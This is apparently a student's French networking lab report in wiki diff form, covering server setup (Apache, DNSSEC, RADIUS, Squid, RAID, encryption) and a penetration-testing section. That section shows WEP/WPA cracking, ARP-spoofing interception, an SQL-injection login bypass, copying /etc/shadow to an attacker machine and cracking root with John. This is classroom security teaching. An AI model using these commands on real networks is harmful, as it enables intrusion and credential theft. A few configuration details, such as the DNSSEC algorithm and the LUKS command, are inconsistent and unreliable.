* Activation du site <code>demineur.site</code> :
 +
 
 +
<pre>a2ensite 000-demineur.site-ssl</pre>
 +
* Modification du fichier <code>nano /etc/apache2/apache2.conf</code> :
 +
 
 +
<pre>ServerName demineur.site</pre>
 +
* Modification du fichier <code>nano /etc/apache2/sites-available/000-default.conf</code> :
 +
 
 +
<pre>Redirect permanent / https://www.demineur.site/</pre>
 +
* Redémarrage du service <code>apache2</code> :
 +
 
 +
<pre>service apache2 restart</pre>
 +
== Configuration DNSSEC ==
 +
 
 +
* Modification du fichier <code>/etc/bind/named.conf.options</code> :
 +
 
 +
<pre>dnssec-enable yes;
 +
dnssec-validation yes;
 +
dnssec-lookaside auto;</pre>
 +
* Création du répertoire <code>demineur.site.dnssec</code> :
 +
 
 +
<pre>mkdir /etc/bind/demineur.site.dnssec/
 +
cd /etc/bind/demineur.site.dnssec/</pre>
 +
* Génération de la clef asymétrique de signature de clefs de zone :
 +
 
 +
<pre>dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE demineur.site</pre>
 +
<pre>mv Kdemineur.site.*.key demineur.site-ksk.key
 +
mv Kdemineur.site.*.private demineur.site-ksk.private</pre>
 +
* Génération de la clef asymétrique de signature des enregistrements :
 +
 
 +
<pre>dnssec-keygen -a RSASHA256 -b 2048 -n ZONE demineur.site</pre>
 +
<pre>mv Kdemineur.site.*.key demineur.site-zsk.key
 +
mv Kdemineur.site.*.private demineur.site-zsk.private</pre>
 +
* Modification du fichier <code>/etc/bind/db.demineur.site</code> :
 +
 
 +
<pre>$include &quot;/etc/bind/demineur.site.dnssec/demineur.site-ksk.key&quot;
 +
$include &quot;/etc/bind/demineur.site.dnssec/demineur.site-zsk.key&quot;</pre>
 +
* Signature des enregistrements de la zone :
 +
 
 +
<pre>dnssec-signzone -o demineur.site -k demineur.site-ksk ../db.demineur.site demineur.site-zsk</pre>
 +
* Modification du fichier <code>/etc/bind/named.conf.local</code> :
 +
 
 +
<pre>zone &quot;demineur.site&quot; {
 +
    type master;
 +
    file &quot;/etc/bind/db.demineur.site.signed&quot;;
 +
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net
 +
};</pre>
 +
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier <code>demineur.site-ksk.key</code>) à Gandi.<br />
 +
L’algorithme utilisé est le 5 (RSA/SHA-1).
 +
 
 +
=== Vérification : ===
 +
 
 +
<pre>cd /etc/bind/
 +
dnssec-verify -o demineur.site db.demineur.site.signed</pre>
 +
<pre>service bind9 restart</pre>
 +
== Configuration du serveur RADIUS ==
 +
 
 +
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).
 +
 
 +
* Installer le paquet <code>freeradius</code> :
 +
 
 +
<pre>apt install freeradius</pre>
 +
* Modifier le fichier <code>/etc/freeradius/clients.conf</code> :
 +
 
 +
<pre>client PA1 {
 +
        ipaddr  = 10.60.101.1
 +
        secret  = glopglop
 +
}
 +
 
 +
client PA2 {
 +
        ipaddr  = 10.60.101.2
 +
        secret  = glopglop
 +
}</pre>
 +
* Ajouter un utilisateur en modifiant le fichier <code>/etc/freeradius/3.0/users</code> :
 +
 
 +
<pre>pifou Cleartext-Password := &quot;pasglop&quot;</pre>
 +
* Modifier le fichier <code>/etc/freeradius/3.0/mods-enables/eap</code> :
 +
 
 +
<pre>eap {
 +
  default_eap_type = peap
 +
  ...
 +
}</pre>
 +
* Arrêter le service <code>freeradius</code> durant la phase de tests :
 +
 
 +
<pre>service freeradius stop</pre>
 +
* Démarrer <code>freeradius</code> en mode debug :
 +
 
 +
<pre>freeradius -X</pre>
 +
Pendant que <code>freeradius</code> est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.<br />
 +
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.
 +
 
 +
* Redémarrer le service <code>freeradius</code> :
 +
 
 +
<pre>service freeradius start</pre>
 +
== Configuration de Squid (serveur mandataire) ==
 +
 
 +
Pour permettre aux utilisateurs connectés aux réseaux Wifi d’avoir un accès à Internet, on configure un serveur mandataire (proxy).
 +
 
 +
* Installer le paquet <code>squid</code> :
 +
 
 +
<pre>apt install squid</pre>
 +
* Faire une sauvegarde de la configuration de <code>squid</code> :
 +
 
 +
<pre>cp /etc/squid/squid.conf /etc/squid/squid.conf.bak</pre>
 +
* Nettoyer le fichier de configuration de <code>squid</code> en retirant les commentaires :
 +
 
 +
<pre>grep -vE &quot;^#|^$&quot; /etc/squid/squid.conf.bak &gt; /etc/squid/squid.conf</pre>
 +
* Modifier le fichier de configuration de <code>squid</code> :
 +
 
 +
<pre>vi /etc/squid/squid.conf</pre>
 +
* Ajouter en dessous de la ligne <code>acl localhost src</code> une liste d’accès pour autoriser le réseau privé à utiliser le proxy :
 +
 
 +
<pre>acl allowedips src 10.60.164.0/24</pre>
 +
* Ajouter la ligne suivante en dessous de la ligne <code>http_access allow localhost</code> :
 +
 
 +
<pre>http_access allow allowedips</pre>
 +
* Configurer le nom de la machine :
 +
 
 +
<pre>visible_hostname demineur</pre>
 +
* Ne pas inclure l’adresse IP dans les requêtes HTTP :
 +
 
 +
<pre>forwarded_for off</pre>
 +
* Sauvegarder et quitter le fichier de configuration
 +
* Redémarrage du service <code>squid</code> :
 +
 
 +
<pre>service squid restart</pre>
 +
== Sécurisation des données ==
 +
 
 +
Afin de sécuriser les données, on configure un RAID5 avec les trois partition LVM de 1Go créées précédemment.
 +
 
 +
* Installer les paquets nécessaires :
 +
 
 +
<pre>apt install mdadm</pre>
 +
* Créer les partitions virtuelles pour le RAID :
 +
 
 +
<pre>lvcreate -L1G -n demineur-raid-1 virtual
 +
lvcreate -L1G -n demineur-raid-2 virtual
 +
lvcreate -L1G -n demineur-raid-3 virtual</pre>
 +
* Ajouter les partitions à la configuration de la VM :
 +
 
 +
<pre>'phy:/dev/virtual/demineur-raid-1,xvdb1,w',
 +
'phy:/dev/virtual/demineur-raid-2,xvdb2,w',
 +
'phy:/dev/virtual/demineur-raid-3,xvdb3,w'</pre>
 +
* Créer le RAID5 à l’aide de la commande <code>mdadm</code> :
 +
 
 +
<pre>mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3</pre>
 +
* Formater la partition RAID5 :
 +
 
 +
<pre>mkfs.ext4 /dev/md0</pre>
 +
* Ajout de la partition au fichier <code>/etc/fstab</code> :
 +
 
 +
<pre>/dev/md0 /media/raid ext4 defaults 0 1</pre>
 +
* On recharge les partitions afin de prendre en compte le RAID :
 +
 
 +
<pre>mount -a</pre>
 +
== Chiffrement des données ==
 +
 
 +
On connecte une clef USB sur laquelle on crée une partition chiffrée.
 +
 
 +
* Installation des paquets nécessaires :
 +
 
 +
<pre>apt install lvm2 cryptsetup</pre>
 +
* Créer une partition <code>sdb1</code> sur la clef USB <code>sdb</code> :
 +
 
 +
<pre>fdisk /dev/sdb</pre>
 +
  → entrer <code>n</code> pour créer une nouvelle partition<br />
 +
  → entrer <code>p</code> pour créer une partition primaire<br />
 +
  → entrer le numéro de la partition<br />
 +
  → début de la partition : laisser par défaut<br />
 +
  → fin de la partition : laisser par défaut (prend tout l’espace disponible)<br />
 +
  → <code>w</code> pour ecrire
 +
 
 +
* Informer le kernel que la table des partitions a changé :
 +
 
 +
<pre>partprobe</pre>
 +
* Initialisation du chiffrement LUKS de la partition :
 +
 
 +
<pre>cryptsetup create home /dev/sdb1 --type luks</pre>
 +
Le chiffrement LUKS montre à l’utilisateur qu’il s’agit d’une partition chiffrée.<br />
 +
Il faut plutôt utiliser le chiffrement PLAIN qui permet de masquer ces informations.
 +
 
 +
<pre>cryptsetup create home /dev/sdb1 --type plain</pre>
 +
* Formatage de la partition :
 +
 
 +
<pre>cryptsetup open --type {plain|luks} /dev/sdb1 home
 +
mkfs.ext4 /dev/mapper/home
 +
cryptsetup close home</pre>
 +
=== Tester le chiffrement : ===
 +
 
 +
* Montage de la partition :
 +
 
 +
<pre>cryptsetup open --type {plain|luks} /dev/sdb1 home
 +
mount /dev/mapper/home /mnt</pre>
 +
* Ajout de fichiers sur la clef :
 +
 
 +
<pre>echo &quot;test&quot; &gt; /mnt/test</pre>
 +
* Démontage de la clef USB :
 +
 
 +
<pre>umount /mnt
 +
cryptsetup close home</pre>
 +
En reconnectant à nouveau la clef, on peut lire le fichier.
 +
 
 +
== Ferme de serveurs Web ==
 +
 
 +
* Installer Docker :
 +
 
 +
<pre>sudo apt install docker.io</pre>
 +
* Créer un fichier de configuration <code>Dockerfile</code> :
 +
 
 +
<pre>FROM httpd:latest
 +
WORKDIR /usr/local/apache2/htdocs
 +
COPY src/ .
 +
CMD [ &quot;httpd&quot;, &quot;-D&quot;, &quot;FOREGROUND&quot; ]</pre>
 +
* Récupérer l’image <code>httpd</code> via Docker Hub :
 +
 
 +
<pre>docker pull httpd</pre>
 +
* Créer l’image Docker :
 +
 
 +
<pre>docker build -t apache .</pre>
 +
* Créer un conteneur :
 +
 
 +
<pre>docker run -d --name apache apache</pre>
 +
= Tests d’intrusion =
 +
 
 +
* Passer en mode super-utilisateur :
 +
 
 +
<pre>su -</pre>
 +
Le paramètre <code>-</code> permet de lire le fichier <code>.bashrc</code> de l’utilisateur <code>root</code> et d’ajouter le répertoire <code>/sbin</code> à la variable d’environnement <code>PATH</code>. Cela permet donc d’accéder aux multiples commandes du paquet <code>aircrack-ng</code>.
 +
 
 +
* Installation des paquets nécessaires :
 +
 
 +
<pre>apt install aircrack-ng pciutils crunch</pre>
 +
== Cassage de clef WEP d’un point d’accès Wifi ==
 +
 
 +
* Vérification du nom de la carte Wifi :
 +
 
 +
<pre>airmon-ng</pre>
 +
La carte Wifi se nomme <code>wlx40a5ef059e47</code>.
 +
 
 +
* Démarrer la carte Wifi en mode de surveillance (monitor mode) :
 +
 
 +
<pre>airmon-ng start wlx40a5ef059e47</pre>
 +
Après activation du mode de surveillance, la carte Wifi se nomme <code>wlan0mon</code>.
 +
 
 +
<pre>airmon-ng start wlan0mon</pre>
 +
* Lancer une écoute de tous les paquets Wifi qui circulent afin de déterminer les paramètres du réseau Wifi à attaquer :
 +
 
 +
<pre>airodump-ng wlan0mon</pre>
 +
Récupérer les informations suivantes :<br />
 +
  → BSSID - 04:DA:D2:9C:50:53<br />
 +
  → Canal - 3<br />
 +
  → SSID - cracotte04
 +
 
 +
* Réaliser un test d’injection sur le point d’accès pour vérifier que la distance entre la carte Wifi et le point d’accès est suffisante :
 +
 
 +
<pre>aireplay-ng -9 -e cracotte04 -a 04:DA:D2:9C:50:53 wlan0mon</pre>
 +
La commande doit retourner un pourcentage proche de 100% pour réaliser l’opération.
 +
 
 +
Il faut désormais lancer deux opérations en parallèle :<br />
 +
  → Cibler le point d’accès avec <code>airodump-ng</code> pour capturer les vecteurs d’initialisation nécessaires au cassage de la clef WEP<br />
 +
  → Associer la carte Wifi et le point d’accès avec <code>aireplay-ng</code> (réalisé par des cartes Raspberry Pi dans la salle de TP)
 +
 
 +
* Récupérer les vecteurs d’initialisation (VI) pour l’algorithme de cassage :
 +
 
 +
<pre>airodump-ng -c 3 --bssid 04:DA:D2:9C:50:53 -w output wlan0mon</pre>
 +
Les VI générés sont enregistrés dans les fichiers <code>output*</code>
 +
 
 +
* Associer la carte Wifi et le point d’accès (relancer si la commande s’arrête) :
 +
 
 +
<pre>aireplay-ng -1 0 -e cracotte04 -a 04:DA:D2:9C:50:53 -h 40:a5:ef:05:9e:47 wlan0mon</pre>
 +
Le paramètre <code>-1</code> permet d’effectuer de fausses authentifications dont le délai entre les demandes est <code>0</code>.<br />
 +
Pour cela, il est nécessaire de spécifier le BSSID de la carte Wifi utilisée pour le cassage.
 +
 
 +
Après un certain temps, un nombre suffisant de VI (entre 30k et 50k pour de ‘Data’ récupérées) a été capturé et la clef WEP peut alors être cassée à l’aide des fichiers <code>output*</code>.
 +
 
 +
* Casser la clef WEP du point d’accès :
 +
 
 +
<pre>aircrack-ng -b 04:DA:D2:9C:50:53 output*.cap</pre>
 +
<pre>KEY FOUND! [ 21:34:56:78:9A:BC:05:CB:A9:87:65:43:21 ]
 +
Decrypted correctly: 100%</pre>
 +
== Cassage du mot de passe WPA-PSK par force brute ==
 +
 
 +
* Vérification du nom de la carte Wifi :
 +
 
 +
<pre>airmon-ng</pre>
 +
La carte Wifi se nomme <code>wlx40a5ef059e47</code>.
 +
 
 +
* Démarrer la carte Wifi en mode de surveillance (monitor mode) :
 +
 
 +
<pre>airmon-ng start wlx40a5ef059e47
 +
airmon-ng start wlan0mon</pre>
 +
Après activation du mode de surveillance, la carte Wifi se nomme <code>wlan0mon</code>.
 +
 
 +
* Lancer une écoute de tous les paquets Wifi qui circulent afin de déterminer les paramètres du réseau Wifi à attaquer :
 +
 
 +
<pre>airodump-ng wlan0mon</pre>
 +
Récupérer les informations suivantes :<br />
 +
  → BSSID - 44:AD:D9:5F:87:02<br />
 +
  → Canal - 3<br />
 +
  → SSID - kracotte03
 +
 
 +
* Cibler la recherche vers le point d’accès pour capturer les VI générés par le PA :
 +
 
 +
<pre>airodump-ng -c 3 --bssid 44:AD:D9:5F:87:02 -w psk wlan0mon</pre>
 +
Il est nécessaire de capturer les VI issus d’un handshake (émis lors de la connexion d’un utilisateur au PA).<br />
 +
Pour cela, des cartes Raspberry Pi présentes dans la salle de TP se connectent aux différents réseaux Wifi WPA.<br />
 +
Ici, les paquets récupérés sont stockés dans des fichiers <code>psk*</code>.
 +
 
 +
* Créer un dictionnaire de toutes les combinaisons décimales possibles sur 8 bits :
 +
 
 +
<pre>crunch 8 8 0123456789 -o dictionnaire</pre>
 +
* Cassage de la PSK :
 +
 
 +
<pre>aircrack-ng -w dictionnaire -b 44:AD:D9:5F:87:02 psk*.cap</pre>
 +
<pre>KEY FOUND! [ 90122222 ]
 +
Master Key    : 2D 1E 30 8D AA 30 91 7A 5D AB B5 80 02 FB 16 3F
 +
                9B DB 91 AC A5 76 4A 33 31 8B D3 7B AC 5A DB A7
 +
 
 +
Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 +
                00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 +
                00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 +
                00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 +
 
 +
EAPOL HMAC    : E6 17 FE C7 E3 14 F0 B9 68 99 97 86 07 41 DA E8</pre>
 +
== Attaque du type “homme du milieu” par usurpation ARP ==
 +
 
 +
Sur la machine qui effectue l’attaque :
 +
 
 +
* Activer le routage IPv4 :
 +
 
 +
<pre>sysctl -w net.ipv4.ip_forward=1</pre>
 +
* Lancer l’empoisonnement du cache ARP de la victime :
 +
 
 +
<pre>arpspoof -i &lt;Nom carte réseau&gt; -t &lt;Adresse IP victime&gt; &lt;Adresse IP passerelle&gt;</pre>
 +
* Vérifier la contamination du cache ARP sur la machine de la victime :
 +
 
 +
<pre>ip n</pre>
 +
* Utiliser l’analyseur de réseau Wireshark (sniffer) pour visualiser le contenu des formulaires HTTP
 +
 
 +
== Intrusion sur un serveur Web ==
 +
 
 +
=== Injection SQL : ===
 +
 
 +
* Se rendre sur un site Web avec la chaîne ci-dessous comme identifiant et mot de passe :
 +
 
 +
<pre>' OR 1 = 1 --</pre>
 +
Soit la requête ci-dessous :
 +
 
 +
<pre>SELECT * FROM USERS WHERE ID='$id' AND PWD='$pwd'</pre>
 +
Ainsi, l’injection SQL permet de commenter la partie de la requête pour le mot de passe et d’effectuer un OU avec une condition toujours vraie afin de récupérer toutes les informations de la base de données :
 +
 
 +
<pre>SELECT * FROM USERS WHERE ID='' OR 1 = 1 --' AND PWD='' OR 1 = 1 --'</pre>
 +
=== Accès à la base de données ===
 +
 
 +
* Installation des paquets nécessaires :
 +
 
 +
<pre>apt-get install dirb</pre>
 +
* Analyse des fichiers du serveur Web :
 +
 
 +
<pre>dirb http://honey.plil.info</pre>
 +
On remarque la présence du répertoire <code>phpmyadmin</code> sur le serveur.
 +
 
 +
* Ouvrir l’URL <code>http://honey.plil.info/phpmyadmin</code> et essayer de se connecter avec les identifiants récupérés
 +
 
 +
=== Connexion au serveur ===
 +
 
 +
* Installation des paquets nécessaires :
 +
 
 +
<pre>apt-get install nmap</pre>
 +
* Vérifier que le serveur est accessible à distance (analyse des ports) :
 +
 
 +
<pre>nmap -6 https://&lt;Adresse du serveur&gt;</pre>
 +
* Se connecter au serveur via <code>ssh</code> avec les identifiants récupérés dans la base de données :
 +
 
 +
<pre>ssh &lt;Utilisateur&gt;@&lt;Adresse du serveur&gt;</pre>
 +
* Récupération des informations sur les utilisateurs :
 +
 
 +
<pre>scp /etc/passwd &lt;Utilisateur pirate&gt;@&lt;Adresse machine pirate&gt;:~/passwd
 +
scp /etc/shadow &lt;Utilisateur pirate&gt;@&lt;Adresse machine pirate&gt;:~/shadow</pre>
 +
=== Cassage du mot de passe root ===
 +
 
 +
* Utilisation des commandes de l’utilitaire de John the Ripper.
 +
 
 +
<pre>unshadow ./passwd ./shadow | grep root &gt; pass</pre>
 +
* Création d’un dictionnaire (on sait que le mot de passe est la répétition d’un mot de 4 lettres deux fois) :
 +
 
 +
<pre>crunch 4 4 abcdefghijklmnopqrstuvwxyz &gt; dico
 +
sed -i 's/\(.*\)/\1\1/' dico</pre>
 +
* Cassage du mot de passe :
 +
 
 +
<pre>/usr/sbin/john -w:dico pass</pre>
 +
* Visualisation du mot de passe en clair après quelques minutes :
 +
 
 +
<pre>/usr/sbin/john --show pass</pre>
 +
= Résumé des séances =
 +
 
 +
== Jeudi 16/09/2021 10h-12h ==
 +
 
 +
=== Tâches effectuées : ===
 +
 
 +
* Plan d’adressage
 
* Architecture réseau
 
* Architecture réseau
 
* Câblage des fibres
 
* Câblage des fibres
  
==Jeudi 23/09/2021 08h-12h==
+
== Jeudi 23/09/2021 08h-12h ==
 +
 
 +
=== Tâches effectuées : ===
  
Tâches effectuées :
 
 
* Câblage des câbles coaxiaux
 
* Câblage des câbles coaxiaux
 
* Configuration de base des trois routeurs
 
* Configuration de base des trois routeurs
 
* Configuration du VLAN 530 sur les deux routeurs principaux
 
* Configuration du VLAN 530 sur les deux routeurs principaux
** La communication avec le routeur en amont (192.168.222.33) est fonctionnelle
+
** La communication avec le routeur en amont (<code>192.168.222.33</code>) est fonctionnelle
 
** Le routeur répond correctement à la sollicitation ICMP par la commande PING
 
** Le routeur répond correctement à la sollicitation ICMP par la commande PING
  
==Vendredi 24/09/2021 08h-12h==
+
== Vendredi 24/09/2021 08h-12h ==
 +
 
 +
=== Tâches effectuées : ===
  
Tâches effectuées :
 
 
* Configuration du VLAN 110 sur les deux routeurs principaux
 
* Configuration du VLAN 110 sur les deux routeurs principaux
 
* Configuration de OSPF
 
* Configuration de OSPF
 
* Configuration de VRRP pour déterminer le routeur actif sur le réseau
 
* Configuration de VRRP pour déterminer le routeur actif sur le réseau
 
** VRRP ne permet pas de choisir une adresse IP en dehors du sous-réseau déclaré
 
** VRRP ne permet pas de choisir une adresse IP en dehors du sous-réseau déclaré
** Le sous-réseau 10.60.100.0/24 est utilisé dans le VLAN 110 pour avoir davantage d'addresses et pour pouvoir utiliser VRRP
+
** Le sous-réseau <code>10.60.100.0/24</code> est utilisé dans le VLAN 110 pour avoir davantage d’addresses et pour pouvoir utiliser VRRP
** Ce sous-réseau n'est pas redistribué via OSPF
+
** Ce sous-réseau n’est pas redistribué via OSPF
  
==Jeudi 26/09/2021 08h-12h==
+
== Jeudi 26/09/2021 08h-12h ==
 +
 
 +
=== Tâches effectuées : ===
  
Tâches effectuées :
 
 
* Configuration des routeurs Cisco 9200 et 6509-E
 
* Configuration des routeurs Cisco 9200 et 6509-E
 
** Tests de connectivité avec Internet fonctionnels
 
** Tests de connectivité avec Internet fonctionnels
*** L'implémentation du protocole NAT sur le Cisco 6509-E a été effectuée
+
*** L’implémentation du protocole NAT sur le Cisco 6509-E a été effectuée
*** Il a fallu ajouter la dernière adresse du réseau 193.48.57.160/28 sur l'interface loopback 0 afin d'activer la redistribution par OSPF
+
*** Il a fallu ajouter la dernière adresse du réseau <code>193.48.57.160/28</code> sur l’interface loopback 0 afin d’activer la redistribution par OSPF
 
*** Les paquets ICMP et UDP sont correctement échangés mais pas ceux TCP
 
*** Les paquets ICMP et UDP sont correctement échangés mais pas ceux TCP
*** Le commutateur Cisco 9200 n'implémente pas le protocole NAT
+
*** Le commutateur Cisco 9200 n’implémente pas le protocole NAT
 
*** La solution trouvée est de passer par des routes statiques
 
*** La solution trouvée est de passer par des routes statiques
*** Sauf si une solution est trouvée, le routeur Cisco 6509-E implémentera également des routes statiques plutôt que d'utiliser le protocole NAT
+
*** Sauf si une solution est trouvée, le routeur Cisco 6509-E implémentera également des routes statiques plutôt que d’utiliser le protocole NAT
** Configuration IPv6
+
* Configuration IPv6
** Configuration des interfaces vers le routeur Cisco ISR 4331 et les points d'accès
+
* La redondance est fonctionnelle : Le commutateur Cisco 9200 prend le relais sur le routeur Cisco 6509-E si celui-ci ne fonctionne plus
** La redondance est fonctionnelle : Le commutateur Cisco 9200 prend le relais sur le routeur Cisco 6509-E si celui-ci ne fonctionne plus
+
* Configuration des interfaces vers le routeur Cisco ISR 4331 et les points d’accès
** Le routeur Cisco ISR 4331 sera connecté au commutateur SR52-pinfo-1 sur l'interface G0/39 (l'interface a été configuré pour commuter le VLAN 532)
+
* Le routeur Cisco ISR 4331 sera connecté au commutateur SR52-pinfo-1 sur l’interface G0/39 (l’interface a été configuré pour commuter le VLAN 532)
 +
 
 +
== Vendredi 12/11/2021 8h-12h ==
 +
 
 +
=== Tâches effectuées : ===
 +
 
 +
* Configuration des routeurs Cisco 9200 et 6509-E
 +
** Installation fonctionnelle, il faut juste trouver une solution pour les paquets UDP filtrés avec NAT (cf. ACL)
 +
** Changement des adresses IP pour le VLAN 530 (et 532)
 +
* Début configuration ISR 4331
 +
* Création VM
 +
** Partitions virtuelles
 +
** Apache + SSL
 +
** DNS
 +
** RAID5
 +
 
 +
== Jeudi 18/11/2021 08h-10h ==
 +
 
 +
=== Tâches effectuées : ===
 +
 
 +
* Configuration de la VM
 +
** Configuration DNS avec Gandi fonctionnelle
 +
** Création du certificat SSL
 +
** Activation du site HTTPS
 +
 
 +
== Vendredi 19/11/2021 08h-12h ==
  
==Mercredi 03/11/2021 14h-18h==
+
=== Tâches effectuées : ===
  
Tâches effectuées :
+
* Tests d’intrusion
 +
** Cassage de clef WEP
 +
** Cassage de clef WPA2
 +
* Configuration de <code>freeradius</code> et couplage au Wifi WPA-EAP
 +
* Configuration DNSSEC
 +
* Cassage de clef WEP et WPA2
  
==Vendredi 05/11/2021 08h-12h==
+
== Lundi 29/11/2021 08h-12h ==
  
Tâches effectuées :
+
=== Tâches effectuées : ===
  
==Vendredi 12/11/2021 08h-12h==
+
* Configuration IPv6
 +
** Communication fonctionnelle entre les réseaux créés et ceux de la plateforme maths/info
 +
** Communication impossible avec Internet (IPv6) à cause de la configuration des routeurs de l’université
 +
* Configuration ISR 4331
 +
* Configuration Wifi EAP
 +
** Adressage DHCP fonctionnel pour les appareils Wifi
 +
** Communication fonctionnelle entre les appareils Wifi connectés et les autres équipements
 +
** Configuration d’un serveur Proxy pour donner aux appareils Wifi un accès à Internet
  
Tâches effectuées :
+
== Vendredi 03/12/2021 08h-10h ==
  
==Vendredi 19/11/2021 08h-12h==
+
=== Tâches effectuées : ===
  
Tâches effectuées :
+
* Examen

Version actuelle datée du 30 novembre 2021 à 17:10

Sommaire

TP Réseaux SE2A5 - Kevin Doolaeghe

Groupe Domaine Nom VM Distribution IPv4 routée VLAN privé Réseau local IPv4 Réseau IPv6 Réseau IPv6 de secours Cisco 6509-E Cisco 9200 N° VRRP SSID n°1 SSID n°2
Groupe 4 demineur.site demineur Debian 10 Buster 193.48.57.164 164 (DEMINEUR) 10.60.164.0/24 2001:660:4401:60A4::/64 2001:7A8:116E:60A4::/64 10.60.164.254 10.60.164.253 64 DEMINEUR1 DEMINEUR2

Repository Github

Lien vers le repository Github

Sommaire

Plan d’adressage

  • Répartition des réseaux :
Groupe Élève Domaine 193.48.57.160/28 10.60.0.0/16 2001:660:4401:60A0::/60 2001:7A8:116E:60A0::/60 VLAN N° VRRP SSID n°1 SSID n°2
1 Basile.Cougnacq barbiegirl.store 193.48.57.161 10.60.161.0/24 2001:660:4401:60A1::/64 2001:7A8:116E:60A1::/64 161 61 BG1 BG2
2 Benoit.Bouckaert zelda-botw.site 193.48.57.162 10.60.162.0/24 2001:660:4401:60A2::/64 2001:7A8:116E:60A2::/64 162 62 ZELDA_BOTW_1 ZELDA_BOTW_2
3 God-Belange.Aradukunda humankind59.site 193.48.57.163 10.60.163.0/2 2001:660:4401:60A3::/64 2001:7A8:116E:60A3::/64 163 63 Humankind1 Humankind2
4 Kevin.Doolaeghe demineur.site 193.48.57.164 10.60.164.0/24 2001:660:4401:60A4::/64 2001:7A8:116E:60A4::/64 164 64 DEMINEUR1 DEMINEUR2
5 Lea.Viciot animal-crossing.site 193.48.57.165 10.60.165.0/24 2001:660:4401:60A5::/64 2001:7A8:116E:60A5::/64 165 65 AnimalCrossing1 AnimalCrossing2
6 Nicolas.Erceau rocketleague.club 193.48.57.166 10.60.166.0/24 2001:660:4401:60A6::/64 2001:7A8:116E:60A6::/64 166 66 Rocket-League-1 Rocket-League-2
7 Quentin.Lemaire gta59.site 193.48.57.167 10.60.167.0/24 2001:660:4401:60A7::/64 2001:7A8:116E:60A7::/64 167 67 GTA1 GTA2
8 Quentin.Maesen fifa59.site 193.48.57.168 10.60.168.0/24 2001:660:4401:60A8::/64 2001:7A8:116E:60A8::/64 168 68 Fifa1 Fifa2
9 Romain.Haye brawl-stars.club 193.48.57.169 10.60.169.0/24 2001:660:4401:60A9::/64 2001:7A8:116E:60A9::/64 169 69 Brawl-Stars-1 Brawl-Stars-2
10 Thomas.Obled warzone59.site 193.48.57.170 10.60.170.0/24 2001:660:4401:60AA::/64 2001:7A8:116E:60AA::/64 170 70 WARZONE1 WARZONE2
11 Valentin.Harlet mario59.site 193.48.57.171 10.60.171.0/24 2001:660:4401:60AB::/64 2001:7A8:116E:60AB::/64 171 71 Mario1 Mario2
12 William.Meslard bffield.store 193.48.57.172 10.60.172.0/24 2001:660:4401:60AC::/64 2001:7A8:116E:60AC::/64 172 72 BATTLEFIELD1 BATTLEFIELD2
13 Yasmine.Haloua toad59.site 193.48.57.173 10.60.173.0/24 2001:660:4401:60AD::/64 2001:7A8:116E:60AD::/64 173 73 Toad1 Toad2
  • Plan d’adressage IPv4 :
VLAN Nom Réseau IPv4 Cisco 6509-E Cisco 9200 Cisco ISR 4331 Routeur plateforme maths/info
110 TP-NET1 193.48.57.160/28 / 10.60.100.0/24 (local) 10.60.100.1 10.60.100.2 10.60.100.3 -
530 INTERCO-4A 192.168.222.64/28 192.168.222.66 192.168.222.67 - 192.168.222.65
532 INTERCO-1B 192.168.222.80/28 - - 192.168.222.82 192.168.222.81
161 BarbieGirl 10.60.161.0/24 10.60.161.1 10.60.161.2 - -
162 Zelda-BOTW 10.60.162.0/24 10.60.162.1 10.60.162.2 - -
163 Humankind 10.60.163.0/24 10.60.163.1 10.60.163.2 - -
164 DEMINEUR 10.60.164.0/24 10.60.164.1 10.60.164.2 - -
165 AnimalCrossing 10.60.165.0/24 10.60.165.1 10.60.165.2 - -
166 Rocket-League 10.60.166.0/24 10.60.166.1 10.60.166.2 - -
167 GTA 10.60.167.0/24 10.60.167.1 10.60.167.2 - -
168 Fifa 10.60.168.0/24 10.60.168.1 10.60.168.2 - -
169 Brawl-Stars 10.60.169.0/24 10.60.169.1 10.60.169.2 - -
170 Warzone 10.60.170.0/24 10.60.170.1 10.60.170.2 - -
171 Mario 10.60.171.0/24 10.60.171.1 10.60.171.2 - -
172 Battlefield 10.60.172.0/24 10.60.172.1 10.60.172.2 - -
173 Toad 10.60.173.0/24 10.60.173.1 10.60.173.2 - -
  • Plan d’adressage IPv6 :
VLAN Nom Réseau IPv6 Cisco 6509-E Cisco 9200 Cisco ISR 4331 Routeur plateforme maths/info
110 TP-NET1 2001:660:4401:60A0::/64 - - - -
530 INTERCO-4A FE80::/10 FE80::2 FE80::3 - FE80::1
532 INTERCO-1B FE80::/10 - - FE80::2 FE80::1
161 BarbieGirl 2001:660:4401:60A1::/64 / 2001:7A8:116E:60A1::/64 - - - -
162 Zelda-BOTW 2001:660:4401:60A2::/64 / 2001:7A8:116E:60A2::/64 - - - -
163 Humankind 2001:660:4401:60A3::/64 / 2001:7A8:116E:60A3::/64 - - - -
164 DEMINEUR 2001:660:4401:60A4::/64 / 2001:7A8:116E:60A4::/64 - - - -
165 AnimalCrossing 2001:660:4401:60A5::/64 / 2001:7A8:116E:60A5::/64 - - - -
166 Rocket-League 2001:660:4401:60A6::/64 / 2001:7A8:116E:60A6::/64 - - - -
167 GTA 2001:660:4401:60A7::/64 / 2001:7A8:116E:60A7::/64 - - - -
168 Fifa 2001:660:4401:60A8::/64 / 2001:7A8:116E:60A8::/64 - - - -
169 Brawl-Stars 2001:660:4401:60A9::/64 / 2001:7A8:116E:60A9::/64 - - - -
170 Warzone 2001:660:4401:60AA::/64 / 2001:7A8:116E:60AA::/64 - - - -
171 Mario 2001:660:4401:60AB::/64 / 2001:7A8:116E:60AB::/64 - - - -
172 Battlefield 2001:660:4401:60AC::/64 / 2001:7A8:116E:60AC::/64 - - - -
173 Toad 2001:660:4401:60AD::/64 / 2001:7A8:116E:60AD::/64 - - - -

Architecture réseau

  • Architecture logique :
caption architecture_logique.jpg
  • Architecture physique :
caption architecture_physique.jpg

Configuration des équipements réseau

Configuration de base

  → Cisco Catalyst 6509-E

